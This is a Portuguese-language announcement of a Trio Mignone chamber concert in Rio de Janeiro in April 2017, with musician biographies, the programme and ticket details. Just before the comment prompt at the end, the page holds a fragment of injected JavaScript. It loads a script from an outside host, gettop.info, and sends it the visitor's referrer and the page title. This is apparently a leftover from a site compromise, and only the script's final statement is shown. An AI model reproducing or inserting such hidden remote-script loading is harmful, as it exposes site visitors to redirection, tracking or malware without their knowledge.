Escrito por em 14 abr 2017 nas áreas Música de câmara, Programação, Rio de Janeiro

Trio Mignone toca obras de Beethoven, Mignone e William Grant Still no Espaço Guiomar Novaes, no Rio de Janeiro.

 

No dia 18 de abril, terça-feira, às 18h30, o Trio Mignone sobe ao palco do Espaço Guiomar Novaes, na Sala Cecília Meireles, no Rio de Janeiro, para concerto da série Recitais de Guiomar. Formado por Afonso Oliveira (flauta), Ricardo Santoro (violoncelo) e Miriam Grosman (piano), o conjunto apresenta obras de Francisco Mignone, William Grant Still e Ludwig van Beethoven.

O Trio Mignone fio criado em 2002 com o objetivo de promover o registro inédito em CD de duas belíssimas obras do maestro Mignone: os trios para flauta, violoncelo e piano. Lançado em 2006 na Sala Cecília Meireles, o álbum obteve a condecoração máxima de cinco diapasons da prestigiosa revista Diapason.

Devido à grande afinidade entre os músicos, todos profissionais da Escola de Música da UFRJ, o Trio Mignone vem mantendo ao longo desses anos, uma trajetória constante de apresentações nas principais salas de concertos do Brasil. Com grande receptividade do público e da crítica especializada, o trio tem como um dos seus principais objetivos a divulgação da música brasileira de concerto, em especial a de Francisco Mignone.

 

Os músicos

Afonso Oliveira graduou-se em Flauta na Escola de Música da UFRJ e concluiu o mestrado na mesma instituição, na qual leciona desde 1999. Foi aluno do professor Eduardo Monteiro e participou de oficinas e masterclasses com os renomados flautistas Mathias Ziegler, Aurèle Nicolet, Felix Rengle e Nobutaka Shimizu. Atuou em diversas formações instrumentais, dentre elas o Brasil Barroco – Coro e Orquestra de Câmara, Conjunto Instrumental Núcleo XVIII, Banda Sinfônica do Corpo de Bombeiros do Estado do Rio de Janeiro, Orquestras Sinfônica Brasileira e Petrobras Sinfônica. Ao lado da cravista Clara Albuquerque e do flautista Eduardo Monteiro, realizou um recital com a integral das sonatas de J. S. Bach para flauta e foi solista da Suíte n. 2 do mesmo compositor, com a Orquestra Sinfônica da UFRJ. Mantém duo com a pianista Miriam Grosman, apresentando-se com regularidade em importantes salas de concertos do Rio de Janeiro.

 

O violoncelista Ricardo Santoro iniciou seus estudos musicais com seu pai, o contrabaixista Sandrino Santoro. É mestre pela UFRJ e violoncelista das Orquestras Sinfônicas Brasileira e da UFRJ. Como solista, se apresentou à frente de várias orquestras, entre elas a Sinfônica Brasileira por quatro vezes. Faz parte dos conjuntos: Duo Santoro (violoncelos), Trio Aquarius (piano, violino e violoncelo), Trio Mignone (piano, flauta e violoncelo), Harmonitango (piano, gaita e violoncelo) e Quarteto Guerra-Peixe (cordas), com os quais se apresenta regularmente por todo o Brasil. Com o Trio Aquarius, participou de duas turnês pela Alemanha e Estados Unidos, tocando nas cidades de Hannover, Berlim, Nova York, Washington, Denver e Selinsgrove. Com o prestigiado Duo Santoro, já se apresentou no famoso Carnegie Hall de Nova York e lançou o CD Bem Brasileiro, obtendo excelente aceitação do público e da crítica especializada. Gravou também os CDs Trios Brasileiros e Peace to the City, com o Trio Aquarius; Francisco Mignone – Obras para flauta, violoncelo e piano, com o Trio Mignone; e David Ganc e Quarteto Guerra-Peixe interpretam Tom Jobim, com o Quarteto Guerra-Peixe – todos dedicados à música brasileira. É responsável pela primeira audição mundial de obras de alguns dos maiores compositores brasileiros, tais como Edino Krieger, João Guilherme Ripper, Ronaldo Miranda, Villani-Côrtes, Nestor de Hollanda Cavalcanti, Sergio Roberto de Oliveira, Alexandre Schubert, entre outros.

 

Doutora em Artes Musicais, título concedido pela Catholic University of America, em Washington DC, a pianista Miriam Grosman é também mestre em Música pela UFRJ. Professora da UFRJ, integra os quadros dos cursos de graduação e pós-graduação como professora de piano e orientadora de dissertações de mestrado. Paralelamente à docência, desenvolve atividade artística relevante como solista e camerista, já tendo se apresentado em várias salas de concertos no Brasil, Portugal, Espanha, Áustria e Estados Unidos, tendo sido contemplada com o apoio do MinC para viagens culturais. Integra o Trio Mignone, com gravações que incluem dois trios inéditos do compositor. Sobre a interpretação dos Seis Estudos Transcendentais, de F. Mignone, Carlos Dantas declarou: “a pianista Miriam Grosman nos dá uma versão que prima pela dinâmica filigranada, pela conduta técnica dominada senhorilmente. Performance nota 10”. (Tribuna da Imprensa, 3 de maio de 2006)

 

PROGRAMA:

Francisco Mignone (1897-1986)
Trio n. 1: Andante-Allegro molto | Modinha | Festança sem Boi

William Grant Still (1895-1978)
Cinco Vinhetas Peruanas: Indiana Moccasin | Carmela | Montana Clinch | Hela Grand Pere | Gardé Piti Mulet Là

Ludwig van Beethoven (1770-1827)
Trio WoO 37 em sol maior: Allegro | Adagio | Andante con variazioni

 

Foto: Priscila Bonfim

 

SERVIÇO:

 

Trio Mignone

 

18 de abril, terça-feira, às 18h30

Espaço Guiomar Novaes – Sala Cecília Meireles (Largo da Lapa, 47, Centro – Rio de Janeiro. Tels.: 21 2332-9223 e 2332-9224)

 

Ingressos: R$ 10, com meia-entrada para estudantes e pessoas com mais de 60 anos, e R$ 2 para estudantes de música mediante apresentação da carteirinha

 

Capacidade: 154 pessoas

 }s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Faça seu comentário